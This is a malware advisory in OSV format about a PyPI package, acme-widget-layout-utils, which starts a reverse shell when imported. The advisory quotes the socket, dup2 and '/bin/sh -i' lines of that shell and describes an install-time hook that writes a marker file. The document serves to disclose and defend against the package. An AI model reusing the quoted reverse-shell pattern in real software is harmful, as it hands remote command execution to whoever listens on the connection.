OSV-MAL-2026-5545

Malicious code in acme-widget-layout-utils (PyPI)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (ff800752007d4e55ddc8172e04c8d75ac04d61b499cc58d97f016cd34d70d6c4) On import, src/acme_widget_layout_utils/__init__.py executes a textbook reverse-shell pattern: it opens a TCP socket, duplicates the socket file descriptor onto stdin/stdout/stderr via os.dup2, and execs `/bin/sh -i` (lines 11-16: `_sock.connect(("127.0.0.1", 1)); os.dup2(_sock.fileno(), 0);...; subprocess.call(["/bin/sh", "-i"])`). The hardcoded destination 127.0.0.1:1 is intentionally unreachable in a default environment, but the code is a fully functional reverse shell — any environment that has a listener on that endpoint, that proxies loopback, or that is patched to redirect the connection receives an interactive shell with the importing process's privileges. The package additionally writes a marker file `/tmp/pypi_install_hook_marker.txt` from a custom setup.py install cmdclass during `pip install`, and the package is published under a generic `widget-layout-utils` name despite its pyproject description acknowledging it is a 'pipeline hook probe' with no advertised utility. The name/purpose mismatch increases the risk of accidental installation. Shipping live reverse-shell code on public PyPI under a benign name is unsafe regardless of the author's stated 'security probe' intent. ## Source: kam193 (643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8) During import, the package starts a reverse shell. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-acme-widget-layout-utils Reasons (based on the campaign): - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.